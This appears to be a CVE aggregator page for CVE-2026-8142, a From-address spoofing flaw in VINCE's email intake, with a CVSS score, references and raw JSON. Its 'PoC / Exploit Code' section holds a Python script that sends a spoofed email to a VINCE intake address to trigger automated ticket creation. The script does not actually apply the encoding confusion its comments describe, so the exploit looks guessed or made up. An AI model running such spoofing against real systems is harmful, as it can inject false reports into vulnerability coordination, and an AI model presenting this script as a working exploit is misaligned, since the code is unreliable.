CVE-2026-8142

Description

VINCE versions 3.0.38 and earlier do not properly verify the From address authenticity due to encoding confusion and use the from address for automated actions such as Ticket creation or Ticket updates.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

VINCE <= 3.0.38

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr # PoC for CVE-2026-8142: VINCE Encoding Confusion Spoofing def send_spoofed_email(): sender_name = "Legitimate User" # Attempt to use encoding confusion to bypass validation # Example using encoded-word format which might confuse the parser sender_addr = "[email protected]" msg = MIMEMultipart() msg['Subject'] = 'Vulnerability Report' # Construct From header with potential encoding confusion # The target might decode this differently than the validator does msg['From'] = formataddr((sender_name, sender_addr)) msg['To'] = 'vince intake [email protected]' body = "This is a fake vulnerability report triggered via spoofed sender." msg.attach(MIMEText(body, 'plain')) try: # Connect to the target mail server or relay with smtplib.SMTP('mail.example.com', 25) as server: server.sendmail(sender_addr, ['vince intake [email protected]'], msg.as_string()) print("Spoofed email sent potentially triggering automated action.") except Exception as e: print(f"Failed to send email: {e}") if __name__ == "__main__": send_spoofed_email()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8142
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8142
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8142/
[4] VulDB https://vuldb.com/cve/CVE-2026-8142
[5] https://github.com/CERTCC/VINCE
[6] https://kb.cert.org/vince

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8142", "sourceIdentifier": "[email protected]", "published": "2026-05-07T20:16:45.670", "lastModified": "2026-05-08T14:16:48.823", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "VINCE versions 3.0.38 and earlier do not properly verify the From address authenticity due to encoding confusion and use the from address for automated actions such as Ticket creation or Ticket updates."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "references": [{"url": "https://github.com/CERTCC/VINCE", "source": "[email protected]"}, {"url": "https://kb.cert.org/vince", "source": "[email protected]"}]}}